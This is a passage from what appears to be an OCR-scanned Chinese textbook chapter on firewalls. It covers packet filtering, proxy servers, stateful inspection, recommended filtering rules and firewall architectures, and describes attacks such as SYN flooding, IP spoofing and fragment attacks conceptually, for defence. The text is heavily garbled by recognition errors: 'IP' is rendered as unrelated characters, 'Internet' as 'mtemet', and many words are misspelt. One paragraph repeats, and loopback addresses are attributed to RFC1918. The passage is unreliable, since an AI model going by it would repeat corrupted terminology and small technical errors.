墙 来 禁止 国内 用 户 去 访问 那些 违反 我 国有 关 规 定 或 者 “有 问题 ”的 国外 站 点 ， 例 如 
www.playboy.com、www.cnn.com 等 。 包 过 滤 路 由 器 的 最 大 的 优点 就 是 它 对 于 用 户 来 说 是 
透明 的 ， 也 就 是 说 不 需要 用 户 名 和 密码 来 登录 。 这 种 防火 墙 速度 快 而 且 易 于 维护 ， 通 常 作 

包 过 滤 路 由 器 的 弊端 也 是 很 明显 的 ， 通 常 它 没有 用 户 的 使 用 记录 ， 这 样 我 们 就 不 能 从 
访问 记录 中 发 现 黑客 的 攻击 记录 。 而 攻击 一 个 单纯 的 包 过 滤 式 的 防火 墙 对 黑客 来 说 是 比较 
容易 的 ， 他 们 在 这 一 方面 已 经 积累 了 大 量 的 经 验 。“ 信 息 包 冲击 ”是 黑客 比较 常用 的 一 种 
攻击 手段 ,黑客 们 对 包 过 滤 式 防火 墙 发 出 一 系列 信息 包 ， 不 过 这 些 包 中 的 他 地址 已 经 被 蔡 
换 掉 了 (FakeIP)， 取 而 代 之 的 是 一 串 顺 序 的 人 P 地 址 。 一 旦 有 一 个 包 通 过 了 防火 墙 ， 黑 客 便 
可 以 用 这 个 人 P 地 址 来 伪装 他 们 发 出 的 信息 。 在 另 一 些 情 况 下 黑客 们 使 用 一 种 他 们 自己 编制 
的 路 由 器 攻击 程序 ， 这 种 程序 使 用 路 由 器 协议 (Routing Information Protcol) 来 发 送 伪造 的 路 
由 信息 ， 这 样 所 有 的 包 都 会 被 重新 路 由 到 一 个 入 侵 者 所 指定 的 特别 地 址 。 对 付 这 种 路 由 器 
的 男 一 种 技术 被 称 为 “同步 淹没 ”， 这 实际 上 是 一 种 网 络 炸弹 。 攻 击 者 向 被 攻击 的 计算 机 
发 出 许 许多 多 个 虚假 的 “同步 请 求 ”信号 包 ， 当 服务 器 响应 了 这 种 信号 包 后 会 等 待 请 求 发 
出 者 的 回答 ， 而 攻击 者 不 做 任何 的 响应 。 如 果 服 务 器 在 45 秒 钟 里 没有 收 到 反应 信号 的 话 就 
会 取消 掉 这 次 请 求 。 但 是 当 服 务 器 在 处 理 成 千 上 万 个 虚假 请 求 时 ， 它 便 没有 时 间 来 处 理 正 
常 的 用 户 请 求 ， 处 于 这 种 攻击 下 的 服务 器 就 和 死 锁 没什么 两 样 。 包 过 滤 防 火 墙 的 缺点 是 很 
明显 的 , 通常 它 没 有 用 户 的 使 用 记录 , 这样 我 们 就 不 能 从 访问 记录 中 发 现 黑客 的 攻击 记录 。 
此 外 ， 配 置 繁琐 也 是 包 过 滤 防 火 墙 的 一 个 缺点 。 它 阻挡 别人 进入 内 部 网 络 ， 但 也 不 告诉 你 
何人 进入 你 的 系统 ， 或 者 何人 从 内 部 进入 网 际 网 络 。 它 可 以 阻止 外 部 对 私有 网 络 的 访问 ， 
却 不 能 记录 内 部 的 访问 。 包 过 滤 另 一 个 关键 的 弱点 就 是 不 能 在 用 户 级 别 上 进行 过 滤 ， 即 不 
能 鉴别 不 同 的 用 户 和 防止 瑟 地 址 盗用 。 
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2. 代理 服务 器 (Proxy Serven) 


代理 服务 器 通常 也 称 作 应 用 级 防火 墙 。 包 过 滤 防 火 墙 可 以 按照 瑟 地 址 来 禁止 未 授权 者 
的 访问 ， 但 是 它 不 适合 单位 用 来 控制 内 部 人 员 访 问 外 界 的 网 络 ， 对 于 这 样 的 企业 来 说 应 用 
级 防火 墙 是 更 好 的 选择 。 所 谓 代理 服务 ， 是 指 防火 墙 内 外 的 计算 机 系统 应 用 层 的 链接 是 在 
两 个 终止 于 代理 服务 的 链接 上 来 实现 的 ， 这 样 便 成 功 地 实现 了 防火 墙 内 外 计算 机 系统 的 隔 
离 。 代理 服务 是 设置 在 Internet 防火 墙 网 关上 的 , 在 网 管 人 员 人 允许 下 拒绝 特定 的 应 用 程度 或 
者 特定 服务 ， 同 时 ， 还 可 应 用 于 实施 较 强 的 数据 流 监控 、 过 滤 、 记 录 和 报告 等 功能 。 一 般 
情况 下 可 应 用 于 特定 的 互联 网 服务 ， 如 超 文本 传输 (HTTP)、 远 程 文件 传输 (FTP) 等 。 代 理 服 
务 器 通常 拥有 高 速 缓存 ， 缓 存 中 存 有 用 户 经 常 访问 的 站 点 的 内 容 ， 在 下 一 个 用 户 要 访问 同 
样 的 站 点 时 ， 服 务 器 就 用 不 着 重复 地 去 找 同样 的 内 容 ， 既 节约 了 时 间 又 节约 了 网 络 资源 。 

3. 状态 监视 器 (State fulinspection) 


状态 监视 器 安全 特性 最 佳 ， 它 采用 了 一 个 在 网 关上 执行 网 络 安全 策略 的 软件 引擎 (也 称 
为 检测 模块 )。 检 测 模块 在 不 影响 网 络 正常 工作 的 前 提 下 ， 采 用 抽取 相关 数据 的 方法 对 网 络 
通信 的 各 层 实施 监测 ， 抽 取 部 分 数据 ， 即 状态 信息 ， 并 动态 地 保存 起 来 作为 以 后 制定 安全 
决策 的 参考 。 检 测 模块 支持 多 种 协议 和 应 用 程序 ， 并 可 以 很 容易 地 实现 应 用 和 服务 的 扩充 。 
与 其 他 安全 方案 不 同 ， 当 用 户 访问 到 达 网 关 的 操作 系统 前 ， 状 态 监 视 器 要 抽取 有 关 数 据 进 
行 分 析 ， 结 合 网 络 配置 和 安全 规定 作出 接纳 、 拒 绝 、 鉴 定 或 给 该 通信 加 密 等 决定 。 一 旦 某 
个 访问 违反 安全 规定 ， 安 全 报警 器 就 会 拒绝 该 访问 ， 并 做 下 记录 ， 然 后 向 系统 管理 器 报告 
网 络 状态 .状态 监视 器 的 另 一 个 优点 就 是 可 以 监测 Remote Procedure Call 和 User Datagrqam 
Protocol 类 的 端口 信息 。 


5.2 ”防火 墙 技术 


5.2.1 包 过 滤 技 术 


包 过 滤 技术 的 原理 在 于 监视 并 过 滤 网 络 上 流入 流出 的 瑟 包 , 拒绝 发 送 可 疑 的 包 。 基 于 
协议 特定 的 标准 ， 路 由 器 在 其 端口 能 够 区 分 包 和 限制 包 的 能 力 叫 包 过 滤 (Packet Filtering)。 
由 于 Internet 与 Intranet 的 连接 多 数 都 要 使 用 路 由 器 ， 所 以 路 由 器 成 为 内 外 通信 的 必 经 端 
口 , 路 由 器 的 厂商 在 路 由 器 上 加 入 IP 过 滤 功 能 , 过 滤 路 由 器 也 可 以 称 作 包 过 滤 路 由 器 或 得 
选 路 由 器 (Packet Filter Router)。 防 火 墙 常常 就 是 这 样 一 个 具备 包 过 滤 功 能 的 简单 路 由 器 ， 
这 种 防火 墙 应 该 是 足够 安全 的 ， 但 前 提 是 配置 合理 。 然 而 一 个 包 过 滤 规 则 是 否 完 全 严密 及 
必要 是 很 难 判定 的 ， 因 而 在 安全 要 求 较 高 的 场合 ， 通 常 还 要 配合 使 用 其 他 的 技术 来 加 强 安 
全 性 。 

路 由 器 逐一 审查 数据 包 以 判定 它 是 否 与 其 他 包 过 滤 规则 相 匹 配 。 每 个 包 有 两 个 部 分 : 
数据 部 分 和 包头 。 过 滤 规 则 以 用 于 他 顺 行 处 理 的 包头 信息 为 基础 ， 不 理会 包 内 的 正文 信息 
内 容 。 包 头 信息 包括 : 卫 源 地 址 、IP 目的 地 址 、 封 装 协 议 (TCP、UDP 或 IP Tunnel)、TCP/UDP 
源 端 口 、ICMP 包 类 型 、 包 输入 接口 和 包 输 出 接口 。 如 果 找 到 一 个 匹配 ， 且 规则 允许 这 包 ， 
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这 一 包 则 根据 路 由 表 中 的 信息 前 行 。 如 果 找 到 一 个 不 匹配 ， 且 规则 拒绝 此 包 ， 这 一 包 则 被 
舍弃 。 如 果 无 匹配 规则 ， 一 个 用 户 配置 的 默认 参数 将 决定 此 包 是 前 行 还 是 被 舍弃 。 

包 过 滤 规 则 允许 路 由 器 取舍 以 一 个 特殊 服务 为 基础 的 信息 流 ， 因 为 大 多 数 服务 检测 器 
驻 留 于 众所周知 的 TCP/UDP 端口 例如, Telnet Service 为 TCP port 23 端口 等 待 远程 连接 ， 
而 SMTP Service 为 TCP Port 25 端口 等 待 输入 连接 。 如 要 封锁 输入 Telnet、SMTP 的 连接 ， 
则 路 由 器 舍弃 端口 值 为 23、25 的 所 有 的 数据 包 。 

1. 典型 的 过 滤 规 则 

典型 的 过 滤 规 则 有 以 下 几 种 。 

(1) 允许 特定 名 单 内 的 内 部 主机 进行 Telnet 输入 会 话 。 

(2) 只 允许 特定 名 单 内 的 内 部 主机 进行 FTP 输入 会 话 。 

(3) 只 允许 所 有 Telnet 输出 会 话 。 

(4) 只 允许 所 有 FTP 输出 会 话 。 

(5) 拒绝 来 自 一 些 特定 外 部 网 络 的 所 有 输入 信息 。 


2. 独立 于 服务 的 攻击 类 型 的 几 种 情况 


有 些 类 型 的 攻击 很 难 用 基本 包头 信息 加 以 鉴别 ， 因 为 这 些 独立 于 服务 。 这 类 攻击 有 以 
下 几 种 情况 。 

(1) 源 卫 地 址 欺骗 攻击 : 入 侵 者 从 伪装 成 源 自 一 台 内 部 主机 的 一 个 外 部 地 点 传送 一 些 
信息 包 ， 这 些 信息 包 包 含 了 一 个 内 部 系统 的 源 他 地址 。 如 果 这 些 信息 包 到 达 路 由 器 的 外 音 
接口 ， 则 舍弃 每 个 含有 这 个 源 他 地 址 的 信息 包 ， 就 可 以 挫败 这 种 源 炊 骗 攻击 。 

(2) 源 路 由 攻击 : 源 站 指定 了 一 个 信息 包 穿越 mtemet 时 应 采取 的 路 径 , 这 类 攻击 企图 
绕 过 安全 措施 ， 并 使 信息 包 沿 一 条 意外 ( 玻 漏 ) 的 路 径 到 达 目 的 地 。 可 以 通过 舍弃 所 有 包含 
这 类 源 路 由 选项 的 信息 包 方式 来 挫败 这 类 攻击 。 

G) 残片 攻击 : 入侵 者 利用 卫 残片 特性 生成 一 个 极 小 的 片断 并 将 TCP 报头 信息 肢解 
成 一 个 分 离 的 信息 包 片断 。 命 弃 所 有 协议 类 型 为 TCP、 到 片断 值 等 于 1 的 信息 包 ， 即 可 所 
败 残片 攻击 。 

3. 过滤 规 则 的 表示 以 及 一 种 高 层 保护 的 过 滤 规 则 


通常 ， 过 滤 规 则 以 表格 的 形式 表示 ， 其 中 包括 以 某 种 次 序 排列 的 条 件 和 动作 序列 。 每 
当 收 到 一 个 包 时 ， 则 按照 从 前 至 后 的 顺序 与 表格 中 每 行 的 条 件 比 较 ， 直 到 满足 某 一 行 的 条 
件 ， 然 后 执行 相应 的 “动作 ”( 转 发 或 舍弃 )。 有 些 数据 包 过 滤 在 实现 时 ，“ 动 作 ” 这 一 项 
还 要 进行 询问 , 若 包 被 丢弃 是 否 要 通知 发 送 者 (通过 发 ICMP 信息 ), 并 能 以 管理 员 指 定 的 顺 
序 进行 条 件 比 较 ， 直 至 找到 满足 的 条 件 。 

对 流 进 和 流出 网 络 的 数据 进行 过 滤 可 以 提供 一 种 高 层 的 保护 。 建 议 过 滤 规 则 如 下 。 

(1) 任何 进入 内 部 网 络 的 数据 包 不 能 把 网 络 内 部 的 地 址 作为 源 地 址 。 

(2) 任何 进入 内 部 网 络 的 数据 包 必须 把 网 络 内 部 的 地 址 作为 目的 地 址 。 

(3) 任何 离开 内 部 网 络 的 数据 包 必须 把 网 络 内 部 的 地 址 作为 源 地 址 。 

(4) 任何 离开 内 部 网 络 的 数据 包 不 能 把 网 络 内 部 的 地 址 作为 目的 地 址 。 
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(5) 任何 进入 或 离开 内 部 网 络 的 数据 包 不 能 把 一 个 私有 地 址 (private address) 或 在 
RFC1918 中 127.0.0.0/8.) 的 地 址 作为 源 或 目的 地 址 。 

(6) 阻塞 任意 源 路 由 包 或 任何 设置 了 IP 选项 的 包 。 

(7) 保留 、DHCP 自动 配置 和 多 播 地 址 也 需要 被 阻塞 。 如 0.0.0.0/8、169.254.0.0/16、 
192.0.2.0/24、224.0.0.0/4、240.0.0.0/4。 


5.2.2 ”应 用 代理 技术 


应 用 代理 技术 又 称 代理 服务 器 (Proxy Service) 技 术 , 代理 服务 器 的 实质 就 是 代理 网 络 用 
户 去 取得 网 络 信息 。 形 象 地 说 ， 它 是 网 络 信息 的 中 转 站 。 

代理 服务 器 系统 一 般 安装 并 运行 在 双 宿 主机 上 。 双 宿主 机 是 一 个 被 取消 路 由 功能 的 主 
机 ， 与 双 宿 主机 相连 的 外 部 网 络 与 内 部 网 络 之 间 在 网 络 层 是 被 断 开 的 。 这 样 做 的 目的 是 使 
外 部 网 络 无 法 了 解 内 部 网 络 的 拓扑 。 

由 于 内 部 网 络 和 外 部 网 络 在 网 络 层 是 断 开 的 ， 所 以 要 实现 内 外 网 络 之 间 的 通信 就 必须 
在 应 用 层 之 上 。 代 理 服 务 器 系统 工作 在 应 用 层 ， 它 是 客户 机 和 真实 服务 器 之 间 的 中 介 ， 代 
理 系统 完全 控制 客户 机 和 真实 服务 器 之 间 的 流量 ， 并 对 流量 情况 加 以 记录 。 

在 一 般 情况 下 , 我 们 使 用 网 络 浏览 器 直接 去 连接 其 他 Internet 站 点 取得 网 络 信息 时 ,是 
直接 连接 到 目的 站 点 服务 器 ， 然 后 由 目的 站 点 服务 器 把 信息 传送 回来 。 代 理 服 务 器 是 介 于 
浏览 器 和 Web 服务 器 之 问 的 另 一 台 服 务 器 ， 有 了 它 之 后 ， 浏 览 器 不 是 直接 到 Web 服务 器 
去 取 回 网 页 而 是 向 代理 服务 器 发 出 请 求 ， 信 号 会 先 送 到 代理 服务 器 ， 由 代理 服务 器 来 取 回 
浏览 器 所 需要 的 信息 并 传送 给 你 的 浏览 器 。 

大 部 分 代理 服务 器 都 具有 缓冲 的 功能 ， 就 好 像 一 个 大 的 cache， 它 有 很 大 的 存储 空间 
它 不 断 将 新 取得 数据 储存 到 它 本 机 的 存储 器 上 ， 如 果 浏 览 器 所 请 求 的 数据 在 它 本 机 的 存储 
器 上 已 经 存在 而 且 是 最 新 的 ， 那 么 它 就 不 重新 从 Web 服务 器 取 数 据 ， 而 直接 将 存储 器 上 的 
数据 传送 给 用 户 的 浏览 器 ， 这 样 就 能 显著 提高 浏览 速度 和 效率 。 


5.2.3 ”状态 检测 技术 


状态 检测 技术 是 防火 墙 近 几 年 才 应 用 的 新 技术 。 

传统 的 包 过 滤 技 术 只 是 通过 检测 人 P 包头 的 相关 信息 来 决定 数据 流 是 通过 还 是 拒绝 , 而 
状态 检测 技术 采用 的 是 一 种 基于 连接 的 状态 检测 机 制 ， 将 属于 同一 连接 的 所 有 包 作 为 一 个 
整体 的 数据 流 看 待 ， 构 成 连接 状态 表 ， 通 过 规则 表 与 状态 表 的 共同 配合 ， 对 表 中 的 各 个 连 
接 状 态 因 素 加 以 识别 。 这 里 动态 连接 状态 表 中 的 记录 可 以 是 以 前 的 通信 信息 ， 也 可 以 是 其 
他 相关 应 用 程序 的 信息 ， 因 此 ， 与 传统 包 过 滤 防 火 墙 的 静态 过 滤 规 则 表 相 比 ， 它 具有 更 好 
的 灵活 性 和 安全 性 。 

先进 的 状态 检测 防火 墙 读 取 、 分 析 和 利用 了 全 面 的 网 络 通 信 信 息 和 状态 ， 包 括 以 下 几 
个 方面 。 


1. 通信 信息 
通信 信息 即 所 有 7 层 协议 的 当前 信息 。 防 火 墙 的 检测 模块 位 于 操作 系统 的 内 核 ， 在 网 
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络 层 之 下 ， 能 在 数据 包 到 达 网 关 操作 系统 之 前 对 它们 进行 分 析 。 防 火 墙 先 在 低 协 议 层 上 检 
查 数据 包 是 否 满 足 企业 的 安全 策略 ， 对 于 满足 的 数据 包 ， 再 从 更 高 协议 层 上 进行 分 析 。 它 
验证 数据 的 源 地 址 、 目 的 地 址 和 端口 号 、 协 议 类 型 、 应 用 信息 等 多 层 的 标志 ， 因 此 具有 更 
全 面 的 安全 性 。 

2. 通信 状态 

通信 状态 即 以 前 的 通信 信息 。 对 于 简单 的 包 过 滤 防 火 墙 ， 如 果 要 允许 FTP 通过 ， 就 必 
须 作 出 让 步 而 打开 许多 端口 ， 这 样 就 降低 了 安全 性 。 状 态 检 测 防 火 墙 在 状态 表 中 保存 以 前 
的 通信 信息 ， 记 录 从 受 保护 网 络 发 出 的 数据 包 的 状态 信息 ， 例 如 FTP 请 求 的 服务 器 地 址 和 
端口 、 客 户 端 地 址 和 为 满足 此 次 FTP 请 求 临 时 打开 的 端口 等 ， 然 后 ， 防 火 墙 根据 该 表 内 容 
对 返回 受 保护 网 络 的 数据 包 进 行 分 析 判断 ， 这 样 ， 只 有 响应 受 保护 网 络 请 求 的 数据 包 才 被 
放行 。 这 里 ， 对 于 UDP 或 者 RPC 等 无 连接 的 协议 ， 检 测 模块 可 创建 虚 会 话 信息 用 来 进行 
跟踪 。 

3. 应 用 状态 

应 用 状态 即 其 他 相关 应 用 的 信息 。 状 态 检 测 模块 能 够 理解 并 学 习 各 种 协议 和 应 用 ， 以 
支持 各 种 最 新 的 应 用 ， 它 比 代理 服务 器 支持 的 协议 和 应 用 要 多 得 多 ， 并 且 它 能 从 应 用 程序 
中 收集 状态 信息 存 入 状态 表 中 ， 以 供 其 他 应 用 或 协议 做 检测 策略 。 例 如 ， 已 经 通过 防火 墙 
认证 的 用 户 可 以 通过 防火 墙 访问 其 他 授权 的 服务 。 

4. 操作 信息 

操作 信息 即 在 数据 包 中 能 执行 逻辑 或 数学 运算 的 信息 。 

状态 监测 技术 ， 采 用 强大 的 面向 对 象 的 方法 ， 基 于 通信 信息 、 通 信 状 态 、 应 用 状态 等 
多 方面 因素 ， 利 用 灵活 的 表达 式 形 式 ， 结 合 安全 规则 、 应 用 识别 知识 、 状 态 关 联 信息 以 及 
通信 数据 ， 构 造 更 复杂 的 、 更 灵活 的 、 满 足 用 户 特定 安全 要 求 的 策略 规则 。 


5.2.4 ”技术 展望 


随 着 新 的 网 络 攻 击 的 出 现 ， 防 火 墙 技术 也 有 一 些 新 的 发 展 趋势 。 这 主要 可 以 从 包 过 滤 
技术 、 防 火 墙 体系 结构 和 防火 墙 系统 管理 三 方面 来 体现 。 

1. 防火 墙 包 过 滤 技 术 发 展 趋势 

1) “用 户 认证 技术 

一 些 防火 墙 厂商 把 在 AAA(Authentication, Authorization, Account， 认 证 、 授 权 和 记 帐 ) 
系统 上 运用 的 用 户 认证 及 其 服务 扩展 到 防火 墙 中 ， 使 其 拥有 可 以 支持 基于 用 户 角色 的 安全 
策略 功能 。 该 功能 在 无 线 网 络 应 用 中 非常 必要 。 具 有 用 户 身 份 验证 的 防火 墙 通常 是 采用 应 
用 级 网 关 技 术 的 ， 包 过 滤 技 术 的 防火 墙 不 具有 。 用 户 身 份 验 证 功能 越 强 ， 它 的 安全 级 别 越 
高 ， 但 它 给 网 络 通信 带 来 的 负面 影响 也 越 大 ， 因 为 用 户 身份 验证 需要 时 间 ， 特 别 是 加 密 型 
的 用 户 身 份 验 证 。 
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2) “多 级 过 滤 技 术 

多 级 过 滤 技 术 是 指 防火 墙 采用 多 级 过 滤 措 施 ， 并 辅 以 鉴别 手段 。 在 分 组 过 滤 (网 络 层 ) 
一 级 ， 过 滤 掉 所 有 的 源 路 由 分 组 和 假冒 的 人 源 地 址 ; 在 传输 层 一 级 ， 遵 循 过 滤 规 则 ， 过 滤 
掉 所 有 禁止 出 的 或 禁止 入 的 或 两 者 都 禁止 的 协议 和 有 害 数据 包 ， 如 nuke 包 、 圣 诞 树 包 等 ; 
在 应 用 网 关 ( 应 用 层 ) 一 级 ， 能 利用 FTP、SMTP 等 各 种 网 关 ， 控 制 和 监测 mtemet 提供 的 所 
用 通用 服务 。 这 是 针对 以 上 各 种 已 有 防火 墙 技术 的 不 足 而 产生 的 一 种 综合 型 过 滤 技 术 ， 它 
可 以 弥补 以 上 各 种 单独 过 滤 技 术 的 不 足 。 

3) “使 防火 墙 具 有 病毒 防护 功能 

现在 通常 被 称 为 “病毒 防火 墙 ”， 当 然 目 前 主要 还 是 在 个 人 防火 墙 中 体现 ， 因 为 它 是 
纯 软 件 形式 ， 更 容易 实现 。 这 种 防火 墙 技术 可 以 有 效 地 防止 病毒 在 网 络 中 的 传播 ， 比 等 待 
攻击 发 生 更 加 积极 。 拥 有 病毒 防护 功能 的 防火 墙 可 以 大 大 减少 公司 的 损失 。 


2. 防火 墙 的 体系 结构 发 展 趋势 


随 着 网 络 应 用 的 增加 ， 对 网 络 带 宽 提 出 了 更 高 的 要 求 。 这 意味 着 防火 墙 要 能 够 以 非常 
高 的 速率 处 理 数据 。 另 外 ， 在 以 后 儿 年 里 ， 多 媒体 应 用 将 会 越 来 越 普遍 ， 它 要 求 数 据 穿 过 
防火 墙 所 带 来 的 延迟 要 足够 小 。 为 了 满足 这 种 需要 ， 一 些 防火 墙 制造 商 开 发 了 基于 ASIC 
的 防火 墙 和 基于 网 络 处 理 器 的 防火 墙 。 从 执行 速度 的 角度 看 来 ， 基 于 网 络 处 理 器 的 防火 墙 
也 是 基于 软件 的 解决 方案 ， 它 需要 在 很 大 程度 上 依赖 于 软件 的 性 能 ， 但 是 由 于 这 类 防火 墙 
中 有 一 些 专门 用 于 处 理 数 据 层面 任务 的 引擎 ， 从 而 减轻 了 CPU 的 负担 ， 该 类 防火 墙 的 性 能 
要 比 传 统 防火 墙 的 性 能 好 许多 。 

与 基于 ASIC 的 纯 硬 件 防火 墙 相 比 ， 基 于 网 络 处 理 器 的 防火 墙 具 有 软件 色彩 ， 因 而 更 
加 具有 灵活 性 。 基 于 ASIC 的 防火 墙 使 用 专门 的 硬件 处 理 网 络 数据 流 ， 比 起 前 两 种 类 型 的 
防火 墙 具 有 更 好 的 性 能 。 但 是 纯 硬 件 的 ASIC 防火 墙 缺乏 可 编程 性 ， 这 就 使 得 它 缺 乏 灵活 
性 ， 从 而 跟 不 上 防火 墙 功 能 的 快速 发 展 。 理 想 的 解决 方案 是 增加 ASIC 芯片 的 可 编程 性 ， 
使 其 与 软件 更 好 地 配合 。 这 样 的 防火 墙 就 可 以 同时 满足 来 自 灵 活性 和 运行 性 能 的 要 求 。 

3. 防火 墙 的 系统 管理 发 展 趋势 

防火 墙 的 系统 管理 也 有 一 些 发 展 趋势 ， 主 要 体现 在 以 下 几 个 方面 。 

1) “集中 式 管理 

分 布 式 和 分 层 的 安全 结构 是 将 来 的 趋势 。 集 中 式 管理 可 以 降低 管理 成 本 ， 并 保证 在 大 
型 网 络 中 安全 策略 的 一 致 性 。 快 速 响应 和 快速 防御 也 要 求 采用 集中 式 管 理 系统 。 目 前 这 种 
分 布 式 防火 墙 早已 在 Cisco( 思 科 )、3Com 等 大 的 网 络 设备 开发 商 中 开发 成 功 ， 也 就 是 目前 
所 称 的 “分 布 式 防火 墙 ” 和 “嵌入 式 防 火 墙 ”。 关 于 这 一 新 技术 在 下 面 将 详细 介绍 。 

2) ”强大 的 审计 功能 和 自动 日 志 分 析 功 能 

这 两 个 功能 可 以 更 早 地 发 现 潜在 的 威胁 并 预防 攻击 。 日 志 功 能 还 可 以 使 管理 员 有 效 地 
发 现 系统 中 存在 的 安全 漏洞 ， 及 时 地 调整 安全 策略 等 各 方面 管理 ， 这 对 安全 管理 具有 非常 
大 的 帮助 。 不 过 具有 这 种 功能 的 防火 墙 通常 是 比较 高 级 的 ， 早 期 的 静态 包 过 滤 防 火 墙 是 不 
具有 的 。 
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3) ”网 络 安全 产品 的 系统 化 

随 着 网 络 安全 技术 的 发 展 ， 现 在 有 一 种 提 法 ， 叫 做 “建立 以 防火 墙 为 核心 的 网 络 安全 
体系 ”。 因 为 我 们 在 现实 中 发 现 ， 仅 现 有 的 防火 墙 技术 难以 满足 当前 网 络 安全 需求 。 通 过 
建立 一 个 以 防火 墙 为 核心 的 安全 体系 ， 就 可 以 为 内 部 网 络 系统 部 署 多 道 安全 防线 ， 各 种 安 
全 技术 各 司 其 职 ， 从 各 方面 防御 外 来 入 侵 。 目前 主要 有 两 种 解决 办 法 : 一 种 是 直接 把 IDS、 
病毒 检测 部 分 直接 “做 ”到 防火 墙 中 ， 使 防火 墙 具 有 IDS 和 病毒 检测 设备 的 功能 ， 另 一 种 
是 各 个 产品 分 立 ， 通 过 某 种 通信 方式 形成 一 个 整体 ， 一 旦 发 现 安全 事件 ， 则 立即 通知 防火 
墙 ， 由 防火 墙 完成 过 滤 和 报告 。 目 前 更 看 重 后 一 种 方案 ， 因 为 它 的 实现 方式 较 前 一 种 容易 
许多 。 


5.3 防火墙 的 体系 结构 


目前 ， 防 火 墙 的 体系 结构 一 般 有 双重 宿主 主机 体系 结构 、 屏 蔽 主机 体系 结构 和 屏蔽 子 
网 体系 结构 几 种 。 


5.3.1 双重 宿主 主机 结构 


双重 宿主 主机 体系 结构 是 围绕 具有 双重 宿主 的 主机 计算 机 而 构筑 的 ， 如 图 5-1 所 示 
该 计算 机 至 少 有 两 个 网 络 接口 。 这 样 的 主机 可 以 充当 与 这 些 接口 相连 的 网 络 之 间 的 路 由 器 。 
它 能 够 从 一 个 网 络 到 另 一 个 网 络 发 送 耳 数据 包 。 然 而 ， 双 重 宿主 主机 的 防火 墙 体 系 结构 禁 
止 这 种 发 送 功能 。 因 而 ， 卫 数据 包 从 一 个 网 络 (例如 因特网 ) 并 不 是 直接 发 送 到 其 他 网 络 ( 例 
如 内 部 的 、 被 保护 的 网 络 )。 防 火 墙 内 部 的 系统 能 与 双重 宿主 主机 通信 ， 同 时 防火 墙 外 部 的 
系统 (在 因特网 上 ) 能 与 双重 宿主 主机 通信 ， 但 是 这 些 系统 不 能 直接 互相 通信 。 它 们 之 间 的 
卫 通信 被 完全 阻止。 

双重 宿主 主机 的 防火 墙 体系 结构 是 相当 简单 的 。 双 重 宿主 主机 位 于 两 者 之 间 ， 并 且 被 
连接 到 因特网 和 内 部 的 网 络 。 


5-1 双重 宿主 主机 防火 墙 


5.3.2 ”屏蔽 主机 结构 


双重 宿主 主机 体系 结构 提供 来 自 与 多 个 网 络 相连 的 主机 的 服务 (但 是 路 由 关闭 )， 而 被 
屏蔽 主机 体系 结构 使 用 一 个 单独 的 路 由 器 提供 仅仅 来 自 与 内 部 的 网 络 相连 的 主机 的 服务 。 
在 这 种 体系 结构 中 ， 主 要 的 安全 由 数据 包 过 滤 提 供 (例如 ， 数 据 包 过 滤 用 于 防止 人 们 绕 过 代 
理 服务 器 直接 相连 )。 
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在 屏蔽 的 路 由 器 上 的 数据 包 过 滤 是 按 这 样 一 种 方法 设置 的 : 堡垒 主机 是 Ptemet 上 的 主 
机 能 连接 到 内 部 网 络 上 的 系统 的 桥梁 (例如 ， 传 送 进来 的 电子 邮件 )。 即 使 这 样 ， 也 仅 有 某 
些 确定 类 型 的 连接 被 允许 。 任 何 外 部 的 系统 试图 访问 内 部 的 系统 或 者 服务 将 必须 连接 到 这 
台 堡 垒 主机 上 。 因 此 ， 堡 公主 机 需要 拥有 高 等 级 的 安全 ， 其 连接 形式 如 图 5-2 所 示 。 


5-2 屏蔽 主机 防火 墙 


数据 包 过 滤 也 允许 堡垒 主机 开放 可 允许 的 连接 到 外 部 世界 。 什 么 是 “可 允许 ”将 由 用 
户 的 站 点 的 安全 策略 决定 。 

在 屏蔽 的 路 由 器 中 数据 包 过 滤 配 置 可 以 按 下 列 之 一 执行 。 

(1) 允许 其 他 的 内 部 主机 为 了 某 些 服务 与 Internet 上 的 主机 连接 ( 即 允 许 那 些 已 经 由 数 
据 包 过 滤 的 服务 )。 

(2) 不 允许 来 自 内 部 主机 的 所 有 连接 (强迫 主机 经 由 堡垒 主机 使 用 代理 服务 )。 

用 户 可 以 针对 不 同 的 服务 混合 使 用 这 些 手段 。 某 些 服务 可 以 被 允许 直接 经 由 数据 包 过 
滤 ， 而 其 他 服务 可 以 被 允许 仅仅 间接 地 经 过 代理 。 这 完全 取决 于 用 户 实行 的 安全 策略 。 

因为 这 种 体系 结构 允许 数据 包 从 Internet 向 内 部 网 移动 , 所 以 , 它 的 设计 比 没有 外 部 数 
据 包 能 到 达 内 部 网 络 的 双重 宿主 主机 体系 结构 似乎 是 更 冒 风险 。 话 说 回来 ， 实 际 上 双重 宿 
主 主机 体系 结构 在 防备 数据 包 从 外 部 网 络 穿 过 内 部 的 网 络 也 容易 产生 失败 (因为 这 种 失败 
类 型 是 完全 出 乎 预料 的 ， 不 大 可 能 防备 黑客 侵袭 )。 进 而 言 之 ， 保 卫 路 由 器 比 保卫 主机 较 易 
实现 ， 因 为 它 提供 非常 有 限 的 服务 组 。 多 数 情况 下 ， 被 屏蔽 的 主机 体系 结构 比 双重 宿主 主 
机 体系 结构 具有 更 好 的 安全 性 和 可 用 性 。 


5.3.3 ”屏蔽 子 网 结构 


屏蔽 子 网 体系 结构 通过 添加 额外 的 安全 层 到 被 屏蔽 主机 体系 结构 ， 即 通过 添加 周边 网 
络 更 进一步 地 把 内 部 网 络 与 mternet 隔离 开 。 在 这 种 结构 下 ,即使 攻破 了 堡垒 主机 ， 也 不 能 
直接 侵入 内 部 网 络 ( 仍 将 必须 通过 内 部 路 由 器 )， 如 图 5-3 所 示 。 


5-3 ”屏蔽 子 网 防火 墙 
如 果 在 屏蔽 主机 体系 结构 中 , 用 户 的 内 部 网 络 对 来 自用 户 的 堡垒 主机 的 侵袭 门户 洞开 ， 
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那么 用 户 的 堡垒 主机 是 非常 诱 人 的 攻击 目标 。 在 它 与 用 户 的 其 他 内 部 计算 机 之 间 没 有 其 他 
的 防御 手段 时 (除了 它们 可 能 有 的 主机 安全 之 外 ， 这 通常 是 非常 少 的 )， 如 果 有 人 成 功 地 侵 
入 屏蔽 主机 体系 结构 中 的 堡垒 主机 ， 那 就 毫 无 阻挡 地 进入 了 内 部 系统 。 

通过 在 周边 网 络 上 隔离 堡垒 主机 ， 能 减少 在 堡垒 主机 上 侵入 的 影响 。 可 以 说 ， 它 只 给 
入 侵 者 一 些 访问 的 机 会 ， 但 不 是 全 部 。 屏 项 子 网 体系 结构 的 最 简单 的 形式 为 ， 两 个 屏蔽 路 
